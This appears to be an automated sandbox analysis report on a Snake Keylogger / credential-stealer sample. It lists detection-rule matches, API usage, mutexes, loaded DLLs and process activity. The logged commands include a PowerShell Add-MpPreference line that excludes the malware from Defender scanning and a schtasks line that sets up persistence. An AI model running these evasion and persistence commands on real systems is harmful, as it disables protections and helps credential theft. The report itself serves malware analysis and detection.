Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.file.exe.37f17a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.rXcourOVPD.exe.3c028a0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 14.2.file.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.rXcourOVPD.exe.3c028a0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.file.exe.37f17a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 4.2.file.exe.38117c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000E.00000002.3757030585.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000F.00000002.1393376066.0000000003C02000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000004.00000002.1358186546.00000000037F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 7544, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: file.exe PID: 6176, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: file.exe PID: 6176, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: rXcourOVPD.exe PID: 6576, type: MEMORYSTR	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rXcourOVPD.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 4.2.file.exe.37f17a0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.37f17a0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.37f17a0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.37f17a0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.38117c0.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.38117c0.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.38117c0.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.file.exe.38117c0.0.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.rXcourOVPD.exe.3c228c0.1.raw.unpack, ---.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.file.exe.6b80000.5.raw.unpack, Gu3LccITshv3oFDMFh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.file.exe.6b80000.5.raw.unpack, TLLCCEdYsihF24ts6B.cs	Security API names: _0020.SetAccessControl
Source: 4.2.file.exe.6b80000.5.raw.unpack, TLLCCEdYsihF24ts6B.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.file.exe.6b80000.5.raw.unpack, TLLCCEdYsihF24ts6B.cs	Security API names: _0020.AddAccessRule
Source: 4.2.file.exe.38e3958.2.raw.unpack, TLLCCEdYsihF24ts6B.cs	Security API names: _0020.SetAccessControl
Source: 4.2.file.exe.38e3958.2.raw.unpack, TLLCCEdYsihF24ts6B.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.file.exe.38e3958.2.raw.unpack, TLLCCEdYsihF24ts6B.cs	Security API names: _0020.AddAccessRule
Source: 4.2.file.exe.38e3958.2.raw.unpack, Gu3LccITshv3oFDMFh.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@22/15@2/2

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Mutant created: \Sessions\1\BaseNamedObjects\IgoEEBVqTtvyFLIsavSVbgG
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8072:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 0000000E.00000002.3761812258.0000000002F8C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F9A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3765060536.0000000003DD2000.00000004.00000800.00020000.00000000.sdmp, file.exe, 0000000E.00000002.3761812258.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002CDB000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3762642230.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, rXcourOVPD.exe, 00000014.00000002.3765693270.0000000003B21000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe C:\Users\user\AppData\Roaming\rXcourOVPD.exe
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmp9DEF.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rXcourOVPD" /XML "C:\Users\user\AppData\Local\Temp\tmpAA33.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rXcourOVPD.exe	Process created: C:\Users\user\AppData\Roaming\rXcourOVPD.exe "C:\Users\user\AppData\Roaming\rXcourOVPD.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
